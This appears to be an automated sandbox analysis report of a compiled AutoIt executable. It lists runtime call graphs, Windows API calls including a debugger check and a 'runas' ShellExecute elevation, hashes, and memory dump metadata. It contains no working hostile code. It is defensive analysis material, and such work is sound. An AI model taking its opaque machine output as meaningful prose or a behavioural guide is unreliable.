95860 e07b72 95858->95860 95859 e07b5a 95859->95819 95946 e06986 95860->95946 95863 e07bb4 95954 e07bbd 50 API calls 2 library calls 95863->95954 95866 e07b93 95866->95863 95868 e07b99 95866->95868 95867 e07bb9 95867->95819 95953 e07a94 47 API calls 4 library calls 95868->95953 95870 e07ba1 GetCurrentThreadId 95870->95819 95872 e0acbf _flsall 95871->95872 95873 e07cf4 __lock 47 API calls 95872->95873 95874 e0acc6 95873->95874 95875 e06986 __calloc_crt 47 API calls 95874->95875 95876 e0acd7 95875->95876 95877 e0ad42 GetStartupInfoW 95876->95877 95878 e0ace2 _flsall @_EH4_CallFilterFunc@8 95876->95878 95885 e0ae80 95877->95885 95887 e0ad57 95877->95887 95878->95823 95879 e0af44 95963 e0af58 RtlLeaveCriticalSection _doexit 95879->95963 95881 e0aec9 GetStdHandle 95881->95885 95882 e06986 __calloc_crt 47 API calls 95882->95887 95883 e0aedb GetFileType 95883->95885 95884 e0ada5 95884->95885 95888 e0ade5 InitializeCriticalSectionAndSpinCount 95884->95888 95889 e0add7 GetFileType 95884->95889 95885->95879 95885->95881 95885->95883 95886 e0af08 InitializeCriticalSectionAndSpinCount 95885->95886 95886->95885 95887->95882 95887->95884 95887->95885 95888->95884 95889->95884 95889->95888 95891 e05ead 95890->95891 95893 e12e8e 95890->95893 95897 e12a7b GetModuleFileNameW 95891->95897 95892 e12ea9 95964 e069d0 47 API calls _W_store_winword 95892->95964 95893->95892 95893->95893 95895 e12eb4 ___crtGetEnvironmentStringsW 95896 e12eca FreeEnvironmentStringsW 95895->95896 95896->95891 95898 e12aaf _wparse_cmdline 95897->95898 95899 e05eb7 95898->95899 95900 e12ae9 95898->95900 95899->95831 95937 e0115b 47 API calls 3 library calls 95899->95937 95965 e069d0 47 API calls _W_store_winword 95900->95965 95902 e12aef _wparse_cmdline 95902->95899 95904 e12ccd __wsetenvp 95903->95904 95908 e12cc5 95903->95908 95905 e06986 __calloc_crt 47 API calls 95904->95905 95913 e12cf6 __wsetenvp 95905->95913 95906 e12d4d 95907 e01c9d _free 47 API calls 95906->95907 95907->95908 95908->95834 95909 e06986 __calloc_crt 47 API calls 95909->95913 95910 e12d72 95912 e01c9d _free 47 API calls 95910->95912 95912->95908 95913->95906 95913->95908 95913->95909 95913->95910 95914 e12d89 95913->95914 95966 e12567 47 API calls 2 library calls 95913->95966 95967 e06e20 IsProcessorFeaturePresent 95914->95967 95916 e12d95 95916->95834 95918 e011a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 95917->95918 95920 e011e0 __IsNonwritableInCurrentImage 95918->95920 95982 e00f0a 52 API calls __cinit 95918->95982 95920->95838 95922 e51ebf 95921->95922 95923 de3a29 95921->95923 95924 de3a63 745AC8D0 95923->95924 95983 e01405 95924->95983 95928 de3a8f 95995 de3adb SystemParametersInfoW SystemParametersInfoW 95928->95995 95930 de3a9b 95996 de3d19 95930->95996 95934->95816 95935->95820 95936->95827 95942->95852 95943->95854 95944->95859 95945->95858 95948 e0698d 95946->95948 95949 e069ca 95948->95949 95950 e069ab Sleep 95948->95950 95955 e130aa 95948->95955 95949->95863 95952 e07ec9 TlsSetValue 95949->95952 95951 e069c2 95950->95951 95951->95948 95951->95949 95952->95866 95953->95870 95954->95867 95956 e130b5 95955->95956 95960 e130d0 __calloc_impl 95955->95960 95957 e130c1 95956->95957 95956->95960 95962 e07c0e 47 API calls __getptd_noexit 95957->95962 95959 e130e0 RtlAllocateHeap 95959->95960 95961 e130c6 95959->95961 95960->95959 95960->95961 95961->95948 95962->95961 95963->95878 95964->95895 95965->95902 95966->95913 95968 e06e2b 95967->95968 95973 e06cb5 95968->95973 95972 e06e46 95972->95916 95974 e06ccf _memset __call_reportfault 95973->95974 95975 e06cef IsDebuggerPresent 95974->95975 95981 e081ac SetUnhandledExceptionFilter UnhandledExceptionFilter 95975->95981 95977 e0a70c _W_store_winword 6 API calls 95978 e06dd6 95977->95978 95980 e08197 GetCurrentProcess TerminateProcess 95978->95980 95979 e06db3 __call_reportfault 95979->95977 95980->95972 95981->95979 95982->95920 95984 e07cf4 __lock 47 API calls 95983->95984 95985 e01410 95984->95985 96048 e07e58 RtlLeaveCriticalSection 95985->96048 95987 de3a88 95988 e0146d 95987->95988 95989 e01491 95988->95989 95990 e01477 95988->95990 95989->95928 95990->95989 96049 e07c0e 47 API calls __getptd_noexit 95990->96049 95992 e01481 96050 e06e10 8 API calls __wopenfile 95992->96050 95994 e0148c 95994->95928 95995->95930 95997 de3d26 __ftell_nolock 95996->95997 95998 ded7f7 48 API calls 95997->95998 95999 de3d31 GetCurrentDirectoryW 95998->95999 96051 de61ca 95999->96051 96001 de3d57 IsDebuggerPresent 96002 e51cc1 MessageBoxA 96001->96002 96003 de3d65 96001->96003 96004 de3e3a 96003->96004 96007 de3d82 96003->96007 96048->95987 96049->95992 96050->95994 96166 dfe99b 96051->96166 96055 de61eb 96056 de5374 50 API calls 96055->96056 96057 de61ff 96056->96057 96058 dece19 48 API calls 96057->96058 96059 de620c 96058->96059 96183 de39db 96059->96183 96061 de6216 Mailbox 96062 de6eed 48 API calls 96061->96062 96063 de622b 96062->96063 96195 de9048 96063->96195 96066 dece19 48 API calls 96067 de6244 96066->96067 96068 ded6e9 55 API calls 96067->96068 96069 de6254 Mailbox 96068->96069 96070 dece19 48 API calls 96069->96070 96071 de627c 96070->96071 96072 ded6e9 55 API calls 96071->96072 96073 de628f Mailbox 96072->96073 96074 dece19 48 API calls 96073->96074 96075 de62a0 96074->96075 96076 ded645 53 API calls 96075->96076 96077 de62b2 Mailbox 96076->96077 96078 ded7f7 48 API calls 96077->96078 96079 de62c5 96078->96079 96198 de63fc 96079->96198 96083 de62df 96084 de62e9 96083->96084 96085 e51c08 96083->96085 96087 e00fa7 _W_store_winword 59 API calls 96084->96087 96086 de63fc 48 API calls 96085->96086 96090 e51c1c 96086->96090 96088 de62f4 96087->96088 96089 de62fe 96088->96089 96088->96090 96092 e00fa7 _W_store_winword 59 API calls 96089->96092 96091 de63fc 48 API calls 96090->96091 96094 e51c38 96091->96094 96093 de6309 96092->96093 96093->96094 96095 de6313 96093->96095 96097 de5374 50 API calls 96094->96097 96096 e00fa7 _W_store_winword 59 API calls 96095->96096 96098 de631e 96096->96098 96099 e51c5d 96097->96099 96100 de635f 96098->96100 96102 e51c86 96098->96102 96106 de63fc 48 API calls 96098->96106 96101 de63fc 48 API calls 96099->96101 96100->96102 96103 de636c 96100->96103 96104 e51c69 96101->96104 96107 de6eed 48 API calls 96102->96107 96111 dfc050 48 API calls 96103->96111 96105 de6eed 48 API calls 96104->96105 96108 e51c77 96105->96108 96109 de6342 96106->96109 96110 e51ca8 96107->96110 96112 de63fc 48 API calls 96108->96112 96113 de6eed 48 API calls 96109->96113 96114 de63fc 48 API calls 96110->96114 96115 de6384 96111->96115 96112->96102 96117 de6350 96113->96117 96118 e51cb5 96114->96118 96116 df1b90 48 API calls 96115->96116 96122 de6394 96116->96122 96119 de63fc 48 API calls 96117->96119 96118->96118 96119->96100 96120 df1b90 48 API calls 96120->96122 96122->96120 96123 de63fc 48 API calls 96122->96123 96124 de63d6 Mailbox 96122->96124 96214 de6b68 48 API calls 96122->96214 96123->96122 96124->96001 96167 ded7f7 48 API calls 96166->96167 96168 de61db 96167->96168 96169 de6009 96168->96169 96170 de6016 __ftell_nolock 96169->96170 96171 de617c Mailbox 96170->96171 96172 de6a63 48 API calls 96170->96172 96171->96055 96173 de6048 96172->96173 96182 de607e Mailbox 96173->96182 96215 de61a6 96173->96215 96175 de61a6 48 API calls 96175->96182 96176 de614f 96176->96171 96177 dece19 48 API calls 96176->96177 96179 de6170 96177->96179 96178 dece19 48 API calls 96178->96182 96180 de64cf 48 API calls 96179->96180 96180->96171 96181 de64cf 48 API calls 96181->96182 96182->96171 96182->96175 96182->96176 96182->96178 96182->96181 96184 de41a9 136 API calls 96183->96184 96185 de39fe 96184->96185 96186 de3a06 96185->96186 96218 e2c396 96185->96218 96186->96061 96189 e52ff0 96191 e01c9d _free 47 API calls 96189->96191 96190 de4252 84 API calls 96190->96189 96192 e52ffd 96191->96192 96193 de4252 84 API calls 96192->96193 96194 e53006 96193->96194 96194->96194 96196 dff4ea 48 API calls 96195->96196 96197 de6237 96196->96197 96197->96066 96199 de641f 96198->96199 96200 de6406 96198->96200 96201 de6a63 48 API calls 96199->96201 96202 de6eed 48 API calls 96200->96202 96203 de62d1 96201->96203 96202->96203 96204 e00fa7 96203->96204 96205 e00fb3 96204->96205 96206 e01028 96204->96206 96213 e00fd8 96205->96213 96253 e07c0e 47 API calls __getptd_noexit 96205->96253 96255 e0103a 59 API calls 4 library calls 96206->96255 96209 e01035 96209->96083 96210 e00fbf 96254 e06e10 8 API calls __wopenfile 96210->96254 96212 e00fca 96212->96083 96213->96083 96214->96122 96216 debdfa 48 API calls 96215->96216 96217 de61b1 96216->96217 96217->96173 96219 de4517 83 API calls 96218->96219 96220 e2c405 96219->96220 96221 e2c56d 94 API calls 96220->96221 96222 e2c417 96221->96222 96223 de44ed 64 API calls 96222->96223 96252 e2c41b 96222->96252 96224 e2c432 96223->96224 96225 de44ed 64 API calls 96224->96225 96226 e2c442 96225->96226 96227 de44ed 64 API calls 96226->96227 96228 e2c45d 96227->96228 96229 de44ed 64 API calls 96228->96229 96230 e2c478 96229->96230 96231 de4517 83 API calls 96230->96231 96232 e2c48f 96231->96232 96233 e0395c _W_store_winword 47 API calls 96232->96233 96234 e2c496 96233->96234 96235 e0395c _W_store_winword 47 API calls 96234->96235 96236 e2c4a0 96235->96236 96237 de44ed 64 API calls 96236->96237 96238 e2c4b4 96237->96238 96239 e2bf5a GetSystemTimeAsFileTime 96238->96239 96240 e2c4c7 96239->96240 96241 e2c4f1 96240->96241 96242 e2c4dc 96240->96242 96244 e2c556 96241->96244 96245 e2c4f7 96241->96245 96243 e01c9d _free 47 API calls 96242->96243 96247 e2c4e2 96243->96247 96246 e01c9d _free 47 API calls 96244->96246 96248 e2b965 118 API calls 96245->96248 96246->96252 96249 e01c9d _free 47 API calls 96247->96249 96250 e2c54e 96248->96250 96249->96252 96251 e01c9d _free 47 API calls 96250->96251 96251->96252 96252->96189 96252->96190 96253->96210 96254->96212 96255->96209 96469 def030 96472 df3b70 96469->96472 96471 def03c 96473 df3bc8 96472->96473 96524 df42a5 96472->96524 96474 df3bef 96473->96474 96476 e56fd1 96473->96476 96479 e56f7e 96473->96479 96485 e56f9b 96473->96485 96475 dff4ea 48 API calls 96474->96475 96477 df3c18 96475->96477 96552 e3ceca 335 API calls Mailbox 96476->96552 96480 dff4ea 48 API calls 96477->96480 96479->96474 96481 e56f87 96479->96481 96533 df3c2c __wsetenvp ___crtGetEnvironmentStringsW 96480->96533 96549 e3d552 335 API calls Mailbox 96481->96549 96482 e56fbe 96551 e2cc5c 86 API calls 4 library calls 96482->96551 96485->96482 96550 e3da0e 335 API calls 2 library calls 96485->96550 96487 df42f2 96571 e2cc5c 86 API calls 4 library calls 96487->96571 96489 e573b0 96489->96471 96490 e57297 96560 e2cc5c 86 API calls 4 library calls 96490->96560 96491 e5737a 96570 e2cc5c 86 API calls 4 library calls 96491->96570 96493 dfdce0 53 API calls 96493->96533 96497 e5707e 96553 e2cc5c 86 API calls 4 library calls 96497->96553 96499 df40df 96561 e2cc5c 86 API calls 4 library calls 96499->96561 96500 ded6e9 55 API calls 96500->96533 96503 ded645 53 API calls 96503->96533 96505 df3f2b 96505->96471 96507 e572d2 96562 e2cc5c 86 API calls 4 library calls 96507->96562 96509 defe30 335 API calls 96509->96533 96511 e57350 96568 e2cc5c 86 API calls 4 library calls 96511->96568 96512 e572e9 96563 e2cc5c 86 API calls 4 library calls 96512->96563 96513 e57363 96569 e2cc5c 86 API calls 4 library calls 96513->96569 96517 de6a63 48 API calls 96517->96533 96519 dff4ea 48 API calls 96519->96533 96520 dfc050 48 API calls 96520->96533 96521 e5714c 96557 e3ccdc 48 API calls 96521->96557 96523 e5733f 96567 e2cc5c 86 API calls 4 library calls 96523->96567 96564 e2cc5c 86 API calls 4 library calls 96524->96564 96525 de6eed 48 API calls 96525->96533 96527 ded286 48 API calls 96527->96533 96529 e571a1 96559 dfc15c 48 API calls 96529->96559 96531 dfee75 48 API calls 96531->96533 96533->96487 96533->96490 96533->96491 96533->96493 96533->96497 96533->96499 96533->96500 96533->96503 96533->96505 96533->96507 96533->96509 96533->96511 96533->96512 96533->96513 96533->96517 96533->96519 96533->96520 96533->96521 96533->96523 96533->96524 96533->96525 96533->96527 96533->96531 96535 e571e1 96533->96535 96544 ded9a0 53 API calls __cinit 96533->96544 96545 ded83d 53 API calls 96533->96545 96546 decdb9 48 API calls 96533->96546 96547 dfc15c 48 API calls 96533->96547 96548 dfbecb 335 API calls 96533->96548 96554 dedcae 50 API calls Mailbox 96533->96554 96555 e3ccdc 48 API calls 96533->96555 96556 e2a1eb 50 API calls 96533->96556 96535->96505 96566 e2cc5c 86 API calls 4 library calls 96535->96566 96537 e5715f 96537->96529 96558 e3ccdc 48 API calls 96537->96558 96538 e571ce 96539 dfc050 48 API calls 96538->96539 96540 e571d6 96539->96540 96540->96535 96542 e57313 96540->96542 96541 e571ab 96541->96524 96541->96538 96565 e2cc5c 86 API calls 4 library calls 96542->96565 96544->96533 96545->96533 96546->96533 96547->96533 96548->96533 96549->96505 96550->96482 96551->96476 96552->96533 96553->96505 96554->96533 96555->96533 96556->96533 96557->96537 96558->96537 96559->96541 96560->96499 96561->96505 96562->96512 96563->96505 96564->96505 96565->96505 96566->96505 96567->96505 96568->96505 96569->96505 96570->96505 96571->96489 96572 e519cb 96577 de2322 96572->96577 96574 e519d1 96610 e00f0a 52 API calls __cinit 96574->96610 96576 e519db 96578 de2344 96577->96578 96611 de26df 96578->96611 96583 ded7f7 48 API calls 96584 de2384 96583->96584 96585 ded7f7 48 API calls 96584->96585 96586 de238e 96585->96586 96587 ded7f7 48 API calls 96586->96587 96588 de2398 96587->96588 96589 ded7f7 48 API calls 96588->96589 96590 de23de 96589->96590 96591 ded7f7 48 API calls 96590->96591 96592 de24c1 96591->96592 96619 de263f 96592->96619 96596 de24f1 96597 ded7f7 48 API calls 96596->96597 96598 de24fb 96597->96598 96648 de2745 96598->96648 96600 de2546 96601 de2556 GetStdHandle 96600->96601 96602 e5501d 96601->96602 96603 de25b1 96601->96603 96602->96603 96605 e55026 96602->96605 96604 de25b7 CoInitialize 96603->96604 96604->96574 96655 e292d4 53 API calls 96605->96655 96607 e5502d 96656 e299f9 CreateThread 96607->96656 96609 e55039 CloseHandle 96609->96604 96610->96576 96657 de2854 96611->96657 96614 de6a63 48 API calls 96615 de234a 96614->96615 96616 de272e 96615->96616 96671 de27ec 6 API calls 96616->96671 96618 de237a 96618->96583 96620 ded7f7 48 API calls 96619->96620 96621 de264f 96620->96621 96622 ded7f7 48 API calls 96621->96622 96623 de2657 96622->96623 96672 de26a7 96623->96672 96626 de26a7 48 API calls 96627 de2667 96626->96627 96628 ded7f7 48 API calls 96627->96628 96629 de2672 96628->96629 96630 dff4ea 48 API calls 96629->96630 96631 de24cb 96630->96631 96632 de22a4 96631->96632 96633 de22b2 96632->96633 96634 ded7f7 48 API calls 96633->96634 96635 de22bd 96634->96635 96636 ded7f7 48 API calls 96635->96636 96637 de22c8 96636->96637 96638 ded7f7 48 API calls 96637->96638 96639 de22d3 96638->96639 96640 ded7f7 48 API calls 96639->96640 96641 de22de 96640->96641 96642 de26a7 48 API calls 96641->96642 96643 de22e9 96642->96643 96644 dff4ea 48 API calls 96643->96644 96645 de22f0 96644->96645 96646 e51fe7 96645->96646 96647 de22f9 RegisterClipboardFormatW 96645->96647 96647->96596 96649 e55f4d 96648->96649 96650 de2755 96648->96650 96677 e2c942 50 API calls 96649->96677 96652 dff4ea 48 API calls 96650->96652 96654 de275d 96652->96654 96653 e55f58 96654->96600 96655->96607 96656->96609 96678 e299df 54 API calls 96656->96678 96664 de2870 96657->96664 96660 de2870 48 API calls 96661 de2864 96660->96661 96662 ded7f7 48 API calls 96661->96662 96663 de2716 96662->96663 96663->96614 96665 ded7f7 48 API calls 96664->96665 96666 de287b 96665->96666 96667 ded7f7 48 API calls 96666->96667 96668 de2883 96667->96668 96669 ded7f7 48 API calls 96668->96669 96670 de285c 96669->96670 96670->96660 96671->96618 96673 ded7f7 48 API calls 96672->96673 96674 de26b0 96673->96674 96675 ded7f7 48 API calls 96674->96675 96676 de265f 96675->96676 96676->96626 96677->96653 96679 e5197b 96684 dfdd94 96679->96684 96683 e5198a 96685 dff4ea 48 API calls 96684->96685 96686 dfdd9c 96685->96686 96687 dfddb0 96686->96687 96692 dfdf3d 96686->96692 96691 e00f0a 52 API calls __cinit 96687->96691 96691->96683 96693 dfdda8 96692->96693 96694 dfdf46 96692->96694 96696 dfddc0 96693->96696 96724 e00f0a 52 API calls __cinit 96694->96724 96697 ded7f7 48 API calls 96696->96697 96698 dfddd7 GetVersionExW 96697->96698 96699 de6a63 48 API calls 96698->96699 96700 dfde1a 96699->96700 96725 dfdfb4 96700->96725 96703 de6571 48 API calls 96707 dfde2e 96703->96707 96706 e524c8 96707->96706 96729 dfdf77 96707->96729 96708 dfdebb 96711 dfdee3 96708->96711 96712 dfdf31 GetSystemInfo 96708->96712 96709 dfdea4 GetCurrentProcess 96738 dfdf5f LoadLibraryA GetProcAddress 96709->96738 96732 dfe00c 96711->96732 96713 dfdf0e 96712->96713 96715 dfdf1c FreeLibrary 96713->96715 96716 dfdf21 96713->96716 96715->96716 96716->96687 96718 dfdf29 GetSystemInfo 96720 dfdf03 96718->96720 96719 dfdef9 96735 dfdff4 96719->96735 96720->96713 96723 dfdf09 FreeLibrary 96720->96723 96723->96713 96724->96693 96726 dfdfbd 96725->96726 96727 deb18b 48 API calls 96726->96727 96728 dfde22 96727->96728 96728->96703 96739 dfdf89 96729->96739 96743 dfe01e 96732->96743 96736 dfe00c 2 API calls 96735->96736 96737 dfdf01 GetNativeSystemInfo 96736->96737 96737->96720 96738->96708 96740 dfdea0 96739->96740 96741 dfdf92 LoadLibraryA 96739->96741 96740->96708 96740->96709 96741->96740 96742 dfdfa3 GetProcAddress 96741->96742 96742->96740 96744 dfdef1 96743->96744 96745 dfe027 LoadLibraryA 96743->96745 96744->96718 96744->96719 96745->96744 96746 dfe038 GetProcAddress 96745->96746 96746->96744 96747 e519ba 96752 dfc75a 96747->96752 96751 e519c9 96753 ded7f7 48 API calls 96752->96753 96754 dfc7c8 96753->96754 96760 dfd26c 96754->96760 96756 dfc865 96757 dfc881 96756->96757 96763 dfd1fa 48 API calls ___crtGetEnvironmentStringsW 96756->96763 96759 e00f0a 52 API calls __cinit 96757->96759 96759->96751 96764 dfd298 96760->96764 96763->96756 96765 dfd28b 96764->96765 96766 dfd2a5 96764->96766 96765->96756 96766->96765 96767 dfd2ac RegOpenKeyExW 96766->96767 96767->96765 96768 dfd2c6 RegQueryValueExW 96767->96768 96769 dfd2fc RegCloseKey 96768->96769 96770 dfd2e7 96768->96770 96769->96765 96770->96769

                                                                                                                  Executed Functions

                                                                                                                  Function 00E0B043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 856 e0b043-e0b080 call e0f8a0 859 e0b082-e0b084 856->859 860 e0b089-e0b08b 856->860 861 e0b860-e0b86c call e0a70c 859->861 862 e0b0ac-e0b0d9 860->862 863 e0b08d-e0b0a7 call e07bda call e07c0e call e06e10 860->863 864 e0b0e0-e0b0e7 862->864 865 e0b0db-e0b0de 862->865 863->861 870 e0b105 864->870 871 e0b0e9-e0b100 call e07bda call e07c0e call e06e10 864->871 865->864 869 e0b10b-e0b110 865->869 874 e0b112-e0b11c call e0f82f 869->874 875 e0b11f-e0b12d call e13bf2 869->875 870->869 905 e0b851-e0b854 871->905 874->875 886 e0b133-e0b145 875->886 887 e0b44b-e0b45d 875->887 886->887 889 e0b14b-e0b183 call e07a0d GetConsoleMode 886->889 890 e0b463-e0b473 887->890 891 e0b7b8-e0b7d5 WriteFile 887->891 889->887 912 e0b189-e0b18f 889->912 896 e0b479-e0b484 890->896 897 e0b55a-e0b55f 890->897 893 e0b7e1-e0b7e7 GetLastError 891->893 894 e0b7d7-e0b7df 891->894 899 e0b7e9 893->899 894->899 903 e0b48a-e0b49a 896->903 904 e0b81b-e0b833 896->904 900 e0b663-e0b66e 897->900 901 e0b565-e0b56e 897->901 909 e0b7ef-e0b7f1 899->909 900->904 908 e0b674 900->908 901->904 910 e0b574 901->910 913 e0b4a0-e0b4a3 903->913 906 e0b835-e0b838 904->906 907 e0b83e-e0b84e call e07c0e call e07bda 904->907 911 e0b85e-e0b85f 905->911 906->907 914 e0b83a-e0b83c 906->914 907->905 915 e0b67e-e0b693 908->915 917 e0b7f3-e0b7f5 909->917 918 e0b856-e0b85c 909->918 919 e0b57e-e0b595 910->919 911->861 920 e0b191-e0b193 912->920 921 e0b199-e0b1bc GetConsoleCP 912->921 922 e0b4a5-e0b4be 913->922 923 e0b4e9-e0b520 WriteFile 913->923 914->911 925 e0b699-e0b69b 915->925 917->904 927 e0b7f7-e0b7fc 917->927 918->911 928 e0b59b-e0b59e 919->928 920->887 920->921 929 e0b440-e0b446 921->929 930 e0b1c2-e0b1ca 921->930 931 e0b4c0-e0b4ca 922->931 932 e0b4cb-e0b4e7 922->932 923->893 924 e0b526-e0b538 923->924 924->909 933 e0b53e-e0b54f 924->933 934 e0b6d8-e0b719 WideCharToMultiByte 925->934 935 e0b69d-e0b6b3 925->935 937 e0b812-e0b819 call e07bed 927->937 938 e0b7fe-e0b810 call e07c0e call e07bda 927->938 939 e0b5a0-e0b5b6 928->939 940 e0b5de-e0b627 WriteFile 928->940 929->917 941 e0b1d4-e0b1d6 930->941 931->932 932->913 932->923 933->903 944 e0b555 933->944 934->893 948 e0b71f-e0b721 934->948 945 e0b6b5-e0b6c4 935->945 946 e0b6c7-e0b6d6 935->946 937->905 938->905 950 e0b5b8-e0b5ca 939->950 951 e0b5cd-e0b5dc 939->951 940->893 953 e0b62d-e0b645 940->953 942 e0b36b-e0b36e 941->942 943 e0b1dc-e0b1fe 941->943 956 e0b370-e0b373 942->956 957 e0b375-e0b3a2 942->957 954 e0b200-e0b215 943->954 955 e0b217-e0b223 call e01688 943->955 944->909 945->946 946->925 946->934 958 e0b727-e0b75a WriteFile 948->958 950->951 951->928 951->940 953->909 961 e0b64b-e0b658 953->961 963 e0b271-e0b283 call e140f7 954->963 976 e0b225-e0b239 955->976 977 e0b269-e0b26b 955->977 956->957 965 e0b3a8-e0b3ab 956->965 957->965 966 e0b77a-e0b78e GetLastError 958->966 967 e0b75c-e0b776 958->967 961->919 962 e0b65e 961->962 962->909 987 e0b435-e0b43b 963->987 988 e0b289 963->988 970 e0b3b2-e0b3c5 call e15884 965->970 971 e0b3ad-e0b3b0 965->971 975 e0b794-e0b796 966->975 967->958 973 e0b778 967->973 970->893 990 e0b3cb-e0b3d5 970->990 971->970 978 e0b407-e0b40a 971->978 973->975 975->899 981 e0b798-e0b7b0 975->981 984 e0b412-e0b42d 976->984 985 e0b23f-e0b254 call e140f7 976->985 977->963 978->941 983 e0b410 978->983 981->915 982 e0b7b6 981->982 982->909 983->987 984->987 985->987 998 e0b25a-e0b267 985->998 987->899 991 e0b28f-e0b2c4 WideCharToMultiByte 988->991 994 e0b3d7-e0b3ee call e15884 990->994 995 e0b3fb-e0b401 990->995 991->987 992 e0b2ca-e0b2f0 WriteFile 991->992 992->893 997 e0b2f6-e0b30e 992->997 994->893 1001 e0b3f4-e0b3f5 994->1001 995->978 997->987 1000 e0b314-e0b31b 997->1000 998->991 1000->995 1002 e0b321-e0b34c WriteFile 1000->1002 1001->995 1002->893 1003 e0b352-e0b359 1002->1003 1003->987 1004 e0b35f-e0b366 1003->1004 1004->995
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 42286fb1bf94380c0b4d3057d0aaf3cc0e07868f06a45710823760d72839c9af
                                                                                                                  • Instruction ID: c8e4f060709372751573a05a4ed987cb8d0506946349d80a8c15c3262ea7c0bf
                                                                                                                  • Opcode Fuzzy Hash: 42286fb1bf94380c0b4d3057d0aaf3cc0e07868f06a45710823760d72839c9af
                                                                                                                  • Instruction Fuzzy Hash: A5325775A022288FCB248F15DC81AEAB7B5FB4A314F5851D9E40AF7A91D7309EC0CF52
                                                                                                                  Function 00DE3D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151windowCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00DE3AA3,?), ref: 00DE3D45
                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,00DE3AA3,?), ref: 00DE3D57
                                                                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,00EA1148,00EA1130,?,?,?,?,00DE3AA3,?), ref: 00DE3DC8
                                                                                                                    • Part of subcall function 00DE6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00DE3DEE,00EA1148,?,?,?,?,?,00DE3AA3,?), ref: 00DE6471
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,00DE3AA3,?), ref: 00DE3E48
                                                                                                                  • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00E928F4,00000010), ref: 00E51CCE
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,00EA1148,?,?,?,?,?,00DE3AA3,?), ref: 00E51D06
                                                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00E7DAB4,00EA1148,?,?,?,?,?,00DE3AA3,?), ref: 00E51D89
                                                                                                                  • ShellExecuteW.SHELL32(00000000,?,?,?,?,00DE3AA3), ref: 00E51D90
                                                                                                                    • Part of subcall function 00DE3E6E: GetSysColorBrush.USER32(0000000F), ref: 00DE3E79
                                                                                                                    • Part of subcall function 00DE3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00DE3E88
                                                                                                                    • Part of subcall function 00DE3E6E: LoadIconW.USER32(00000063), ref: 00DE3E9E
                                                                                                                    • Part of subcall function 00DE3E6E: LoadIconW.USER32(000000A4), ref: 00DE3EB0
                                                                                                                    • Part of subcall function 00DE3E6E: LoadIconW.USER32(000000A2), ref: 00DE3EC2
                                                                                                                    • Part of subcall function 00DE3E6E: RegisterClassExW.USER32(?), ref: 00DE3F30
                                                                                                                    • Part of subcall function 00DE36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DE36E6
                                                                                                                    • Part of subcall function 00DE36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DE3707
                                                                                                                    • Part of subcall function 00DE36B8: ShowWindow.USER32(00000000,?,?,?,?,00DE3AA3,?), ref: 00DE371B
                                                                                                                    • Part of subcall function 00DE36B8: ShowWindow.USER32(00000000,?,?,?,?,00DE3AA3,?), ref: 00DE3724
                                                                                                                    • Part of subcall function 00DE4FFC: _memset.LIBCMT ref: 00DE5022
                                                                                                                    • Part of subcall function 00DE4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DE50CB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
